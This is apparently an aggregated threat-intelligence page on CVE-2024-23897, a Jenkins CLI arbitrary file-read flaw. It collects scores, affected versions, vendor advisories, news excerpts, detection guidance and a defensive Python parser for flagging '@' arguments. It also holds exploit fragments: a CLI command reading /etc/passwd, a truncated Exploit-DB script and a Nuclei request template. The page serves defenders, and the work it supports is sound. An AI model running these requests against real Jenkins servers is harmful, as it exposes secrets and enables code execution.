CVE-2024-23897
Published 2024-01-24
Priority P1 · 100 · critical · 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, due 2024-09-09
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jenkins | git_server_plugin | — | — |
| jenkins | gitlab_branch_source_plugin | — | — |
| jenkins | jenkins | < 2.426.3 | 2.426.3 |
| jenkins | jenkins | < 2.442 | 2.442 |
| jenkins | jenkins_core | — | — |
| jenkins | jenkins_lts | — | — |
| jenkins | jenkins_uses_the_strict_crumb_issuer_plugin | — | — |
| jenkins | jenkins_weekly | — | — |
| jenkins | log_command_plugin | — | — |
| jenkins | matrix_project_plugin | — | — |
| jenkins | qualys_policy_compliance_scanning_connector_plugin | — | — |
| jenkins | red_hat_dependency_analytics_plugin | — | — |
Detection & IOCs (extracted from sources)
Command: java -jar jenkins-cli.jar -s http://172.17.0[.]1:8080/ -auth admin:pass reload-job @/etc/passwd
- Monitor Jenkins access logs and web server logs for POST requests to the /cli endpoint containing the '@' character followed by a file path in the arguments — this is the core exploit pattern for CVE-2024-23897.
- A SIEM rule should flag any Jenkins CLI command containing the '@' character in its arguments, as this is the core of the exploit.
- The exploit uses the Jenkins PlainCLIProtocol binary format: each message is framed with a 4-byte big-endian int length, followed by a 1-byte opcode, then data. Signature-based detection should look for this binary framing in POST bodies to /cli.
- Attack requests from Windows machines to Jenkins use windows-1252 encoding; requests from Linux machines use UTF-8. Encoding in the CLI POST body can help distinguish the attacker platform.
- WebSocket-based exploit requests will have masking applied to the data, making user input invisible in captures. Inspect masked WebSocket frames to the Jenkins CLI endpoint as a potential attack vector.
- Unauthenticated attackers can exploit CLI commands including 'help', 'who-am-i', 'restart', 'shutdown', and 'enable-job' with the '@' file-read technique. Monitor for these commands with '@' arguments in Jenkins logs.
- Authenticated attackers can use CLI commands such as 'connect-node', 'reload-job', 'delete-job', 'delete-node', 'disconnect-node', 'offline-node', and 'online-node' with '@/path/to/file' to read entire files. Alert on these commands with '@' prefixed arguments.
- Check Point IPS blade signature 'Jenkins Information Disclosure (CVE-2024-23897)' provides detection coverage for this vulnerability.
- Unauthenticated attackers are limited to reading the first few lines of files; the exact number of lines depends on the CLI command used. Authenticated users with Overall/Read permission can read entire files.
- CVE-2024-23897 is exploitable via HTTP, WebSocket, and SSH, with HTTP and WebSocket having the highest chance of exploitation.
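The detection notes above describe the PlainCLIProtocol framing (a 4-byte big-endian length, a 1-byte opcode, then data) and recommend flagging '@'-prefixed arguments and inspecting the ENCODING value. The following Python is an added example written for this page; it is not code from the page, from Jenkins, or from any of the sources quoted. It parses a /cli POST body into frames, flags ARG frames that begin with '@', and extracts the client's declared encoding. Two things are assumptions of mine and should be checked against the Jenkins source before use: the opcode numbering in OPCODES, and that the length field counts the opcode byte plus the data. The sample body is constructed, not captured.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

# Opcode names in the ordinal order of Jenkins' PlainCLIProtocol.Op enum as I
# recall it. ASSUMPTION for illustration; the logic below only relies on the
# ARG and ENCODING positions, so verify those two against the Jenkins source.
OPCODES = {0: "ARG", 1: "LOCALE", 2: "ENCODING", 3: "START", 4: "EXIT",
           5: "STDIN", 6: "END_STDIN", 7: "STDOUT", 8: "STDERR"}
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3


@dataclass
class Frame:
    opcode: int
    data: bytes

    @property
    def name(self) -> str:
        return OPCODES.get(self.opcode, f"UNKNOWN({self.opcode})")


def build_frame(opcode: int, data: bytes) -> bytes:
    """Encode one frame: 4-byte big-endian length, 1-byte opcode, data.
    ASSUMPTION: the length counts the opcode byte plus the data
    (DataOutputStream-style framing). If your captures differ, adjust
    here and in parse_frames."""
    return struct.pack(">I", len(data) + 1) + bytes([opcode]) + data


def parse_frames(body: bytes) -> List[Frame]:
    """Split a /cli POST body into frames. Stops cleanly on truncated or
    malformed input instead of raising, so a partial capture still yields
    every frame that arrived complete."""
    frames: List[Frame] = []
    pos = 0
    while pos + 4 <= len(body):
        (length,) = struct.unpack(">I", body[pos:pos + 4])
        pos += 4
        if length < 1 or pos + length > len(body):
            break  # zero-length or truncated frame: do not mis-parse the rest
        frames.append(Frame(body[pos], body[pos + 1:pos + length]))
        pos += length
    return frames


def find_at_file_args(body: bytes) -> List[str]:
    """Every ARG frame whose value starts with '@': the args4j expandAtFiles
    trigger the advisory describes."""
    return [f.data.decode("utf-8", errors="replace")
            for f in parse_frames(body)
            if f.opcode == OP_ARG and f.data.startswith(b"@")]


def client_encoding(body: bytes) -> Optional[str]:
    """Value of the ENCODING frame, if any (e.g. UTF-8 vs windows-1252),
    which the IoC notes use to distinguish the attacker platform."""
    for f in parse_frames(body):
        if f.opcode == OP_ENCODING:
            return f.data.decode("ascii", errors="replace")
    return None


def is_suspicious_cli_request(method: str, uri: str, body: bytes) -> bool:
    """Detection predicate: a POST to the CLI endpoint (optionally under a
    context path) whose framed body carries an '@'-prefixed argument."""
    path = uri.split("?", 1)[0].rstrip("/")
    return method.upper() == "POST" and path.endswith("/cli") \
        and bool(find_at_file_args(body))


def build_sample_body() -> bytes:
    """Constructed sample body (not a real capture): the frames a 'help'
    invocation would carry if one of its arguments were '@/etc/passwd'."""
    return b"".join([
        build_frame(OP_ARG, b"help"),
        build_frame(OP_ARG, b"@/etc/passwd"),
        build_frame(OP_ARG, b"1"),
        build_frame(OP_ENCODING, b"UTF-8"),
        build_frame(OP_LOCALE, b"en_US"),
        build_frame(OP_START, b""),
    ])


if __name__ == "__main__":
    sample = build_sample_body()
    for frame in parse_frames(sample):
        print(f"{frame.name:<9} {frame.data!r}")
    print("suspicious:", is_suspicious_cli_request("POST", "/cli?remoting=false", sample))
    print("encoding:", client_encoding(sample))
```

Run it against a saved request body and `is_suspicious_cli_request` gives the same verdict the Suricata rule quoted further down approximates with byte patterns, but on the decoded argument list, so a path that happens to fall outside the rule's `within:` windows is still caught. WebSocket traffic needs unmasking before the body is handed to `parse_frames`, as the notes point out.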
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
| vendor_oracle | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 9.8 | CRITICAL | — |
CISA
Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
cisa·2024-08-19·CVSS 9.8
CVE-2024-23897 [CRITICAL] CWE-27 Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
Vulnerability: Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
Affected: Jenkins Jenkins Command Line Interface (CLI)
Jenkins Command Line Interface (CLI) contains a path traversal vulnerability that allows attackers limited read access to certain files, which can lead to code execution.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314; https://nvd.nist.gov/vuln/detail/CVE-2024-23897
Remediation Due Date: 2024-09-09
Oracle
Oracle Oracle Communications Risk Matrix: Automated Test Suite Framework (Jenkins) — CVE-2024-23897
vendor_oracle·2024-07-15·CVSS 9.8
CVE-2024-23897 [CRITICAL] Oracle Oracle Communications Risk Matrix: Automated Test Suite Framework (Jenkins) — CVE-2024-23897
Oracle Oracle Communications Risk Matrix: Automated Test Suite Framework (Jenkins) vulnerability
CVE: CVE-2024-23897
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujul2024 (JUL 2024)
Jenkins
Jenkins Security Advisory 2024-01-24
vendor_jenkins·2024-01-24·CVSS 9.8
CVE-2023-6147 [CRITICAL] Jenkins Security Advisory 2024-01-24
Title: Jenkins Security Advisory 2024-01-24
Jenkins Security Advisory 2024-01-24
This advisory announces vulnerabilities in the following Jenkins deliverables:
- Jenkins (core)
- Git server Plugin
- GitLab Branch Source Plugin
- Log Command Plugin
- Matrix Project Plugin
- Qualys Policy Compliance Scanning Connector Plugin
- Red Hat Depen
Red Hat
jenkins: Arbitrary file read vulnerability through the CLI can lead to RCE
vendor_redhat·2024-01-09·CVSS 9.8
CVE-2024-23897 [CRITICAL] CWE-88 jenkins: Arbitrary file read vulnerability through the CLI can lead to RCE
jenkins: Arbitrary file read vulnerability through the CLI can lead to RCE
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
A flaw was found in Jenkins, which uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces the "@" character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default; Jenkins 2.441 and earlier as well as LTS 2.426.2 and earlier do not disable it.
Mitigat
OSV
Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
osv·2024-01-24
CVE-2024-23897 [CRITICAL] Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
Jenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment.
Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.
This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.
* Attackers with Overall/Read permission can read entire files.
* Attackers w
GHSA
Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
ghsa·2024-01-24
CVE-2024-23897 [CRITICAL] CWE-22 Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
Jenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment.
Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.
This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.
* Attackers with Overall/Read permission can read entire files.
* Attackers w
VulnCheck
Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-23897 [CRITICAL] CWE-27 Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
Jenkins Command Line Interface (CLI) contains a path traversal vulnerability that allows attackers limited read access to certain files, which can lead to code execution.
Affected: Jenkins Jenkins Command Line Interface (CLI)
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-30&host_type=src&vulnerability=cve-2024-23897; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-31&host_type=src&vulnerability=cve-2024-23897; https://dashboard.shadowserver.org/statistics/hone
Suricata
ET EXPLOIT Jenkins Unauthenticated RCE Attempt Observed (CVE-2024-23897)
suricata·2024-01-29·CVSS 9.8
CVE-2024-23897 [CRITICAL] ET EXPLOIT Jenkins Unauthenticated RCE Attempt Observed (CVE-2024-23897)
ET EXPLOIT Jenkins Unauthenticated RCE Attempt Observed (CVE-2024-23897)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Jenkins Unauthenticated RCE Attempt Observed (CVE-2024-23897)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cli?remoting="; startswith; fast_pattern; http.request_body; content:"|00|"; within:30; content:"@"; within:10; reference:cve,2024-23897; classtype:attempted-admin; sid:2050517; rev:2; metadata:affected_product Jenkins, attack_target Server, created_at 2024_01_29, cve CVE_2024_23897, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mit
Exploit-DB
Jenkins 2.441 - Local File Inclusion
exploitdb·2024-04-15·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins 2.441 - Local File Inclusion
Jenkins 2.441 - Local File Inclusion
---
```python
# Exploit Title: Jenkins 2.441 - Local File Inclusion
# Date: 14/04/2024
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip
# Version: 2.441
# Tested on: Debian 12 (Bookworm)
# CVE: CVE-2024-23897
from argparse import ArgumentParser
from requests import Session, post, exceptions
from threading import Thread
from uuid import uuid4
from time import sleep
from re import findall


class Exploit(Thread):
    def __init__(self, url: str, identifier: str):
        Thread.__init__(self)
        self.daemon = True
        self.url = url
        self.params = {"remoting": "false"}
        self.identifier = identifier
        self.stop_thread = False
        self.listen = False

    def run(self
```
Metasploit
Jenkins cli Ampersand Replacement Arbitrary File Read
metasploit
Jenkins cli Ampersand Replacement Arbitrary File Read
Jenkins cli Ampersand Replacement Arbitrary File Read
This module utilizes the Jenkins cli protocol to run the `help` command. The cli is accessible with read-only permissions by default, which are all that's required. Jenkins cli utilizes `args4j's` `parseArgument`, which calls `expandAtFiles` to replace any `@` with the contents of a file. We are then able to retrieve the error message to read up to the first two lines of a file. Exploitation by hand can be done with the cli, see markdown documents for additional instructions. There are a few exploitation oddities: 1. The injection point for the `help` command requires 2 input arguments. When the `expandAtFiles` is called, each line of the `FILE_PATH` becomes an input argument. If a file only contains one line, it will throw an error: `E
Nuclei
Jenkins < 2.441 - Arbitrary File Read
nuclei·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins < 2.441 - Arbitrary File Read
Jenkins (c === 'x' ? Math.random() * 16 | 0 : (Math.random() * 16 | 0 & 0x3 | 0x8)).toString(16));
let conn, conn2;
try { conn = m.OpenTLS('tcp', address) } catch { conn = m.Open('tcp', address)}
conn.Send(`POST /cli?remoting=false HTTP/1.1\r\nHost:${Host}\r\nSession: ${session_id}\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n`);
resp = conn.RecvString(1000)
try { conn2 = m.OpenTLS('tcp', address) } catch { conn2 = m.Open('tcp', address)}
conn2.Send(`POST /cli?remoting=false HTTP/1.1\r\nHost:${Host}\r\nContent-type: application/octet-stream\r\nSession: ${session_id}\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n${Body}`)
resp2 = conn.RecvString(1000)
args:
Body: "{{payload}}"
Host: "{{Host}}"
Port: 80,443 # if
Greynoiseio
GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
blogs_greynoiseio·2025-02-26·CVSS 9.8
[CRITICAL] GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
Qualys
Defense Lessons From the Black Basta Ransomware Playbook
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook
## Table of Contents
Know Your Enemy's Playbook
Attackers Move Fast
How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against evolving
Bleepingcomputer
CISA warns of Jenkins RCE bug exploited in ransomware attacks
blogs_bleepingcomputer·2024-08-19·CVSS 9.8
[CRITICAL] CISA warns of Jenkins RCE bug exploited in ransomware attacks
## CISA warns of Jenkins RCE bug exploited in ransomware attacks
## Sergiu Gatlan
CISA has added a critical Jenkins vulnerability that can be exploited to gain remote code execution to its catalog of security bugs, warning that it's actively exploited in attacks.
Jenkins is a widely used open-source automation server that helps developers automate the process of building, testing, and deploying software through continuous integration (CI) and continuous delivery (CD).
Tracked as CVE-2024-23897, this flaw is caused by a weakness in the args4j command parser that unauthenticated attackers can exploit to read arbitrary files on the Jenkins controller file system through the built-in command line interface (CLI).
"This command parser has a feature that replaces an @ character followed b
Qualys
Cybersecurity Threat Landscape 2024 Midyear Review
blogs_qualys·2024-08-06
Cybersecurity Threat Landscape 2024 Midyear Review
## Table of Contents
Key Takeaways from the Threat Landscape Report 2024
Vulnerability and Threat Analysis in the Cybersecurity Landscape 2024
Cyber Threat Landscape 2024: A Detailed Review
Key Statistics and Their Impact on the 2024 Cybersecurity Landscape
Mid-2024's Most Exploited Vulnerabilities in the Cybersecurity Landscape
Conclusion
As we navigate the complexities of 2024, it’s crucial to pause and reflect on the evolving threat landscape that surrounds us. This moment offers a unique opportunity to scrutinize our triumphs and missteps, understand the events that have decisively shaped our environment, and consider those that have subtly influenced it. By extracting key lessons from our recent experiences, we can fortify our strategies and prepare more effectively for the emerg
Qualys
Oracle Critical Patch Update, July 2024 Security Update Review
blogs_qualys·2024-07-17
Oracle Critical Patch Update, July 2024 Security Update Review
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Rapid Response with Patch Management (PM)
Oracle released its third quarterly edition of Critical Patch Update, which contains patches for 386 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in various product families, including third-party components in Oracle products.
In the third quarterly Oracle Critical Patch Update, Oracle Communications received the highest number of patches, 95, constituting about 24% of the total patches released. Oracle Financial Services Applications and Oracle Fusion Middleware foll
Zscaler
CVE-2024-3094 | ThreatLabz
blogs_zscaler·2024-04-01·CVSS 10.0
[CRITICAL] CVE-2024-3094 | ThreatLabz
Checkpoint
25th March – Threat Intelligence Report
blogs_checkpoint·2024-03-25
CVE-2024-29943 25th March – Threat Intelligence Report
## 25th March – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 25th March, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Japanese tech company Fujitsu discovered malware on its work computers, risking exposure of customer data. The company, a leading IT firm, detected unauthorized access that potentially allowed personal and customer information to be illicitly extracted. Immediate actions included isolating affected computers and enhancing mon
Trendmicro
Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
blogs_trendmicro·2024-03-19·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
Exploits & Vulnerabilities
# Jenkins Args4j CVE-2024-23897: Files Exposed, Code at Risk
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897.
By: Arun Shaji
2024/03/19
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897. Jenkins employs a built-in Command-Line Interface (CLI) to facilitate interaction from script or shell environments and uses the args4j library to parse command arguments and options on the Jenkins controller during CLI command processing. The vulnerability exists in this library, allowing an unauthenticated user to read the first few lines of any files on the file system. Additionally, auth
Zscaler
ScreenConnect Vulnerabilities | ThreatLabz
blogs_zscaler·2024-03-11·CVSS 10.0
[CRITICAL] ScreenConnect Vulnerabilities | ThreatLabz
Zscaler
CVE-2024-23897 | ThreatLabz
blogs_zscaler·2024-02-06·CVSS 9.8
[CRITICAL] CVE-2024-23897 | ThreatLabz
Wiz
Crying Out Cloud - February Newsletter | Wiz
blogs_wiz·2024-02-01·CVSS 9.8
CVE-2023-33246 [CRITICAL] Crying Out Cloud - February Newsletter | Wiz
This month we’ve seen a lot of action, with both vulnerabilities and security incidents that have left users affected. We bring you the latest cloud security highlights, to help you stay informed and stay secure. Let's dive in.
Here are our top picks!
## 🐞 High Profile Vulnerabilities
Apache RocketMQ RCE vulnerability exploited in-the-wild
In August 2023 researchers identified attackers exploiting CVE-2023-33246, a critical vulnerability in Apache RocketMQ, to install the DreamBus bot, a malware strain last reported about publicly in 2021. On January 5, 2024 Apache stated that the patch for CVE-2023-33246 was in fact insufficient, and an additional CVE was assigned to the bypass - CVE-2023-37582. The latter vulnerability is also being exploited in the wild, so it is recommended to patc
Checkpoint
29th January – Threat Intelligence Report
blogs_checkpoint·2024-01-29
CVE-2024-23222 29th January – Threat Intelligence Report
## 29th January – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 29th January, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Following the reports on Russia-affiliated APT29 (AKA Cozy Bear, Midnight Blizzard) attack against Microsoft, also Hewlett-Packard Enterprise acknowledged it was attacked by the same threat actor. While Microsoft detected the breach on January 12 and the password-spray attack began in November 2023; HPE’s investigation po
Bleepingcomputer
45k Jenkins servers exposed to RCE attacks using public exploits
blogs_bleepingcomputer·2024-01-29·CVSS 9.8
CVE-2024-23897 [CRITICAL] 45k Jenkins servers exposed to RCE attacks using public exploits
## 45k Jenkins servers exposed to RCE attacks using public exploits
## Bill Toulas
Researchers found roughly 45,000 Jenkins instances exposed online that are vulnerable to CVE-2024-23897, a critical remote code execution (RCE) flaw for which multiple public proof-of-concept (PoC) exploits are in circulation.
Jenkins is a leading open-source automation server for CI/CD, allowing developers to streamline the building, testing, and deployment processes. It features extensive plugin support and serves organizations of various missions and sizes.
On January 24, 2024, the project released versions 2.442 and LTS 2.426.3 to fix CVE-2024-23897, an arbitrary file read problem that can lead to executing arbitrary command-line interface (CLI) commands.
The issue arises from the CLI's feature that
Bleepingcomputer
Exploits released for critical Jenkins RCE flaw, patch now
blogs_bleepingcomputer·2024-01-28·CVSS 9.8
[CRITICAL] Exploits released for critical Jenkins RCE flaw, patch now
## Exploits released for critical Jenkins RCE flaw, patch now
## Bill Toulas
Multiple proof-of-concept (PoC) exploits for a critical Jenkins vulnerability allowing unauthenticated attackers to read arbitrary files have been made publicly available, with some researchers reporting attackers actively exploiting the flaws in attacks.
Jenkins is an open-source automation server widely used in software development, particularly for Continuous Integration (CI) and Continuous Deployment (CD).
It plays a critical role in automating various parts of the software development process, like building, testing, and deploying applications. It supports over a thousand integration plugins and is used by organizations of all sizes, including large enterprises.
SonarSource researchers discovered two fla
Sentinelone
Black Basta
blogs_sentinelone·2022-11-30
Black Basta
Huntress
CVE-2024-23897 Vulnerability: Analysis, Impact, Mitigation | Huntress
blogs_huntress·CVSS 9.8
CVE-2024-23897 [CRITICAL] CVE-2024-23897 Vulnerability: Analysis, Impact, Mitigation | Huntress
## CVE-2024-23897 Vulnerability
Published: 10/27/2025
Written by: Monica Burgess
CVE-2024-23897 is a high-severity arbitrary file read vulnerability affecting the popular Jenkins automation server. It stems from an issue in the command line interface (CLI) feature, allowing an attacker to read any file on the Jenkins controller's file system. This flaw lets unauthenticated attackers read the first few lines of files, while attackers with "Overall/Read" permissions can access entire files. This can lead to remote code execution (RCE) by exposing sensitive information like cryptographic keys.
## When was it discovered?
The CVE-2024-23897 vulnerability was publicly disclosed by Jenkins as part of a security advisory on January 24, 2024. The advisory detailed this vulnerability along with
Sentinelone
Black Basta
blogs_sentinelone
Black Basta
# Black Basta Ransomware: In-Depth Analysis, Detection, and Mitigation
## Summary of Black Basta Ransomware
Black Basta first emerged in early 2022. The ransomware family is an evolution of the Hermes/Ryuk/Conti families. Black Basta was heavily advertised in underground cybercrime markets. Black Basta practices double extortion – demanding payment for a decryptor, as well as for the non-release of stolen data. There are Windows and Linux variants of Black Basta ransomware. The group is responsible for hundreds of attacks against global targets of varying sectors.
February 2025 Update: Nearly a year’s worth of Black Basta chat logs have been released on Telegram, providing detailed insight into the group's operational workflow, reconnaissance activities, and specific userID and details o
arXiv
Advancing LLM-Based Security Automation with Customized Group Relative Policy Optimization for Zero-Touch Networks
arxiv_fulltext·2025-12-10
Advancing LLM-Based Security Automation with Customized Group Relative Policy Optimization for Zero-Touch Networks
Xinye Cao, Graduate Student Member, IEEE, Yihan Lin, Guoshun Nan, Member, IEEE, Qinchuan Zhou,
Yuhang Luo, Yurui Gao, Zeliang Zhang, Haolang Lu, Qimei Cui, Senior Member, IEEE, \ Hou, Member, IEEE, Xiaofeng Tao, Senior Member, IEEE, Tony Q.S. Quek, Fellow, IEEE
This work was supported in part by the National Natural Science Foundation of China under Grant 62471064; in part by the National Research Foundation, Singapore and Infocomm Media Development Authority under its Communications and Connectivity Bridging Funding Initiative; in part by the Beijing Natural Science Foundation Program (No.L232002); in part by Beijing University of Posts and Telecommunications (BUPT) Excellen
arXiv
Cybersecurity AI Benchmark (CAIBench): A Meta-Benchmark for Evaluating Cybersecurity AI Agents
arxiv_fulltext·2025-10-28
Cybersecurity AI Benchmark (CAIBench): A Meta-Benchmark for Evaluating Cybersecurity AI Agents
## Abstract
Cybersecurity spans multiple interconnected domains, complicating the development of meaningful, labor-relevant benchmarks. Existing benchmarks assess isolated skills rather than integrated performance. We find that pre-trained knowledge of cybersecurity in LLMs does not imply attack and defense abilities, revealing a gap between knowledge and capability. To address this limitation, we present the Cybersecurity AI Benchmark (CAIBench), a modular meta-benchmark framework that allows evaluating LLM models and agents across offensive and defensive cybersecurity domains, taking a step towards meaningfully measuring their labor-relevance. CAIBench integrates five evaluation categories, covering over 10,000 instances: Jeopardy-style CTFs, Attack and Defense CTFs, Cyber Range e
CTF
sherlocks / README
ctf_writeups·CVSS 9.8
[CRITICAL] sherlocks / README
---
layout: default
title: Sherlocks
nav_order: 5
description: "70+ HTB Sherlock DFIR investigation writeups"
permalink: /sherlocks/
---
# HackTheBox Sherlocks - Comprehensive Index
> Complete index of all known HackTheBox Sherlock DFIR investigation labs with writeup links, difficulty ratings, categories, and key techniques.
Sherlocks are defensive security labs that simulate real-world security incidents. You investigate evidence, analyze artifacts, and answer forensic questions to solve the case.
---
## Summary
| Difficulty | Path | Count | Focus |
|------------|------|-------|-------|
| [Easy](#easy-sherlocks) | Easy | 25+ | Log Analysis, Basic DFIR, Simple Malware Triage |
| [Medium](#medium-sherlocks) | Medium | 30+ | Memory Forensics, AD Attacks, Cloud IR, Complex Malware |
|
CTF
ippsec-video-index
ctf_writeups·CVSS 8.6
[HIGH] ippsec-video-index
# IppSec HTB Video Index - Complete Reference
> The most comprehensive index of IppSec's HackTheBox video walkthroughs.
> Data sourced from [ippsec.rocks](https://ippsec.rocks) dataset, GitHub, and community resources.
> Last updated: 2026-04-10
## Stats
| Category | Count |
|----------|-------|
| HTB Machine Walkthroughs | 432 |
| UHC (Ultimate Hacking Championship) | 12 |
| HTB Sherlocks (DFIR) | 7 |
| VulnHub Machines | 4 |
| Tutorials / Methodology / Special | 61 |
| HTB Academy Modules | 17 |
| **Total Unique Content** | **533** |
| Total Searchable Entries (timestamps) | 9,245 |
## Key Resources
| Resource | URL |
|----------|-----|
| YouTube Channel | [youtube.com/ippsec](https://youtube.com/ippsec) |
| Searchable Video Index | [ippsec.rocks](https://ippsec.rocks) |
| GitHub |
References:
- http://packetstormsecurity.com/files/176839/Jenkins-2.441-LTS-2.426.3-CVE-2024-23897-Scanner.html
- http://packetstormsecurity.com/files/176840/Jenkins-2.441-LTS-2.426.3-Arbitrary-File-Read.html
- http://www.openwall.com/lists/oss-security/2024/01/24/6
- https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
- https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
- https://www.vicarius.io/vsociety/posts/the-anatomy-of-a-jenkins-vulnerability-cve-2024-23897-revealed-1
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23897
Timeline:
- 2024-01-24: Published
- 2024-08-19: Added to CISA KEV
- Exploited in the wild